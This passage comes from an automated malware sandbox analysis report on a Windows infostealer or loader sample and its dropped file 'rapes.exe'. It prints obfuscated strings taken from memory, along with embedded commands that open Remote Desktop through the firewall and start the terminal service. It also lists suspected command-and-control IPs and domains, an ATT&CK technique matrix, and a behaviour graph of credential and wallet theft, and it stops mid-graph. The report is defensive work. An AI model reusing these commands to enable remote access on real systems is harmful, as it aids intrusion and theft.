vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: rapes.exeString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: rapes.exe, 00000004.00000003.946478690.0000000004E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000004.00000003.946478690.0000000004E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: rapes.exe, 00000009.00000003.1269297866.00000000051D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: rapes.exe, 00000009.00000003.1269297866.00000000051D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F13A0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,17_2_009F13A0

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information111
                              Scripting                              		Valid Accounts121
                              Windows Management Instrumentation                              		111
                              Scripting                              		1
                              Abuse Elevation Control Mechanism                              		1
                              Disable or Modify Tools                              		2
                              OS Credential Dumping                              		1
                              System Time Discovery                              		1
                              Remote Desktop Protocol                              		11
                              Archive Collected Data                              		11
                              Ingress Tool Transfer                              		Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts2
                              Native API                              		11
                              DLL Side-Loading                              		11
                              DLL Side-Loading                              		11
                              Deobfuscate/Decode Files or Information                              		LSASS Memory13
                              File and Directory Discovery                              		Remote Desktop Protocol41
                              Data from Local System                              		21
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts13
                              Command and Scripting Interpreter                              		11
                              Scheduled Task/Job                              		1
                              Access Token Manipulation                              		1
                              Abuse Elevation Control Mechanism                              		Security Account Manager349
                              System Information Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts11
                              Scheduled Task/Job                              		21
                              Registry Run Keys / Startup Folder                              		512
                              Process Injection                              		3
                              Obfuscated Files or Information                              		NTDS1081
                              Security Software Discovery                              		Distributed Component Object ModelInput Capture3
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                              Scheduled Task/Job                              		23
                              Software Packing                              		LSA Secrets3
                              Process Discovery                              		SSHKeylogging124
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                              Registry Run Keys / Startup Folder                              		1
                              Timestomp                              		Cached Domain Credentials451
                              Virtualization/Sandbox Evasion                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              DLL Side-Loading                              		DCSync1
                              Application Window Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
                              Masquerading                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt451
                              Virtualization/Sandbox Evasion                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
                              Process Injection                              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Rundll32                              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631980 Sample: mQRr8Rkorf.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 149 techspherxe.top 2->149 151 fostinjec.today 2->151 153 6 other IPs or domains 2->153 171 Suricata IDS alerts for network traffic 2->171 173 Found malware configuration 2->173 175 Antivirus detection for URL or domain 2->175 177 20 other signatures 2->177 11 rapes.exe 40 2->11         started        16 mQRr8Rkorf.exe 1 4 2->16         started        18 rapes.exe 2->18         started        20 4 other processes 2->20 signatures3 process4 dnsIp5 157 176.113.115.6, 49696, 49697, 49699 SELECTELRU Russian Federation 11->157 159 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 11->159 161 pulseon.top 82.115.223.119 MIDNET-ASTK-TelecomRU Russian Federation 11->161 137 C:\Users\user\AppData\Local\...\packed.exe, PE32+ 11->137 dropped 139 C:\Users\user\AppData\Local\...\bncn6rv.exe, PE32 11->139 dropped 141 C:\Users\user\AppData\Local\...\amnew.exe, PE32 11->141 dropped 147 13 other malicious files 11->147 dropped 253 Contains functionality to start a terminal service 11->253 255 Hides threads from debuggers 11->255 257 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->257 22 ADFoyxP.exe 11->22         started        26 HmngBpR.exe 12 11->26         started        28 pwHxMTy.exe 11->28         started        30 9hUDDVk.exe 11->30         started        143 C:\Users\user\AppData\Local\...\A7B94.exe, PE32 16->143 dropped 145 C:\Users\user\AppData\Local\...\3E11p.exe, PE32 16->145 dropped 259 Writes many files with high entropy 16->259 33 A7B94.exe 1 4 16->33         started        261 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->261 263 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->263 265 Maps a DLL or memory area into another process 20->265 267 Found direct / indirect Syscall (likely to bypass EDR) 20->267 35 cmd.exe 20->35         started        37 TradeHub.com 20->37         started        file6 signatures7 process8 dnsIp9 93 C:\Users\user\AppData\Local\...\Worcester.pub, data 22->93 dropped 107 36 other malicious files 22->107 dropped 185 Multi AV Scanner detection for dropped file 22->185 187 Writes many files with high entropy 22->187 39 cmd.exe 22->39         started        95 C:\Users\user\AppData\...\vcruntime140.dll, PE32 26->95 dropped 97 C:\Users\user\AppData\Local\...\msvcp140.dll, PE32 26->97 dropped 99 C:\Users\user\AppData\Local\...\SplashWin.exe, PE32 26->99 dropped 109 2 other malicious files 26->109 dropped 189 Found direct / indirect Syscall (likely to bypass EDR) 26->189 42 SplashWin.exe 26->42         started        191 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 28->191 193 Injects a PE file into a foreign processes 28->193 45 pwHxMTy.exe 28->45         started        48 WerFault.exe 28->48         started        169 agroecologyguide.digital 104.21.48.201 CLOUDFLARENETUS United States 30->169 101 C:\Users\user\AppData\Local\...\2R0700.exe, PE32 33->101 dropped 103 C:\Users\user\AppData\Local\...\1E08u3.exe, PE32 33->103 dropped 195 Antivirus detection for dropped file 33->195 50 1E08u3.exe 4 33->50         started        52 2R0700.exe 33->52         started        105 C:\Users\user\AppData\Local\...\uvwnwebboksg, PE32 35->105 dropped 197 Injects code into the Windows Explorer (explorer.exe) 35->197 54 conhost.exe 35->54         started        file10 signatures11 process12 dnsIp13 115 C:\Users\user\AppData\Local\Temp\...\Seat.com, PE32 39->115 dropped 56 Seat.com 39->56         started        60 cmd.exe 39->60         started        62 conhost.exe 39->62         started        68 10 other processes 39->68 117 C:\Users\user\AppData\...\vcruntime140.dll, PE32 42->117 dropped 119 C:\Users\user\AppData\...\msvcp140.dll, PE32 42->119 dropped 121 C:\Users\user\AppData\...\SplashWin.exe, PE32 42->121 dropped 123 C:\Users\user\AppData\...\DuiLib_u.dll, PE32 42->123 dropped 221 Switches to a custom stack to bypass stack traces 42->221 223 Found direct / indirect Syscall (likely to bypass EDR) 42->223 64 SplashWin.exe 42->64         started        163 fostinjec.today 104.21.112.1 CLOUDFLARENETUS United States 45->163 225 Tries to harvest and steal ftp login credentials 45->225 227 Tries to harvest and steal browser information (history, passwords, etc) 45->227 229 Tries to steal Crypto Currency Wallets 45->229 125 C:\Users\user\AppData\Local\...\rapes.exe, PE32 50->125 dropped 231 Antivirus detection for dropped file 50->231 233 Multi AV Scanner detection for dropped file 50->233 235 Detected unpacking (changes PE section rights) 50->235 243 6 other signatures 50->243 66 rapes.exe 50->66         started        165 176.113.115.7, 49688, 49698, 49700 SELECTELRU Russian Federation 52->165 167 defaulemot.run 104.21.48.1, 443, 49681, 49682 CLOUDFLARENETUS United States 52->167 237 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 52->237 239 Query firmware table information (likely to detect VMs) 52->239 241 Found many strings related to Crypto-Wallets (likely being stolen) 52->241 file14 signatures15 process16 file17 127 C:\Users\user\AppData\Local\...\TradeHub.com, PE32 56->127 dropped 129 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 56->129 dropped 131 C:\Users\user\AppData\Local\...\TradeHub.js, ASCII 56->131 dropped 133 C:\Users\user\AppData\Local\...\F, data 56->133 dropped 199 Drops PE files with a suspicious file extension 56->199 201 Writes to foreign memory regions 56->201 203 Writes many files with high entropy 56->203 205 Injects a PE file into a foreign processes 56->205 70 cmd.exe 56->70         started        73 cmd.exe 56->73         started        135 C:\Users\user\AppData\Local\Temp\353090\m, data 60->135 dropped 207 Maps a DLL or memory area into another process 64->207 209 Switches to a custom stack to bypass stack traces 64->209 211 Found direct / indirect Syscall (likely to bypass EDR) 64->211 75 cmd.exe 64->75         started        213 Multi AV Scanner detection for dropped file 66->213 215 Detected unpacking (changes PE section 